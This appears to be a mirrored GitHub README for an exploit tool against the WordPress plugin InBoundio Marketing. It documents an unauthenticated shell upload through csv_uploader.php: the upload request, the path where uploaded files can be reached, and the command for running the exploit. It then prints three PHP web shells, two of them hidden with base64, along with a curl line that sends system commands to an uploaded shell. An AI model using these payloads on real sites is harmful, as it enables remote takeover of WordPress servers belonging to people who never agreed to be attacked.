Code Monkey home page Code Monkey logo

wordpress-plugin-inboundio-marketing-shell-upload's Introduction

  • WordPress plugin InBoundio Marketing Shell Upload / INURL - BRASIL

  # AUTOR:        Cleiton Pinheiro / Nick: googleINURL
  # Blog:         http://blog.inurl.com.br
  # Twitter:      https://twitter.com/googleinurl
  # Fanpage:      https://fb.com/InurlBrasil
  # Pastebin      http://pastebin.com/u/Googleinurl
  # GIT:          https://github.com/googleinurl
  # PSS:          http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:      http://youtube.com/c/INURLBrasil
  # PLUS:         http://google.com/+INURLBrasil
  • Vendor

http://www.inboundio.com

  • Vulnerability Description

WordPress plugin (InBoundio Marketing) remote shell upload vulnerability.

  • Tool Description

The script makes file upload without permission

  • REQUEST POST SEND

array('file' => "@_YOU_FILE")
  • URL REQUEST SEND

http://{target}/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php
  • URL FILE ACCESS

http://{target}/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/_YOU_FILE
  • EXECUTE EXPLOIT

   -t : SET TARGET.
   -f : SET FILE UPLOAD.
   Execute:
                 php xlp.php -t target -f shell.php
  • OUTPUT VULN

filename: Exploit_AFU.txt

  • EXEMPLE SHELL UPLOAD

[+] MODEL-01 CODE >>
<?php $__=@base64_decode("c3lzdGVt");echo@$__(isset($_REQUEST[0])?$_REQUEST[0]:NULL);?>
 
[+] MODEL-02 CODE >>
<?php echo(`{$_REQUEST[0]}`);?>
 
[+] MODEL-03 CODE >>
<?php $_=$_REQUEST[0];@$__=@create_function('$_',base64_decode("ZWNobyhzaGVsbF9leGVjKCRfKSk7"));@$__($_);
 
# EXECUTE: curl "http://localhost/of.php?0=uname%20-a%20%26%26%20ls%20-la"
  • REFERENCE

[1] http://pastebin.com/D07wPKmA

[2] http://k3dsec.blogspot.com/2015/03/wordpress-plugin-inboundio-marketing.html

[3] http://blog.inurl.com.br/2015/03/inurl-brasil-simple-shell-backdoor.html

wordpress-plugin-inboundio-marketing-shell-upload's People

Contributors

googleinurl avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.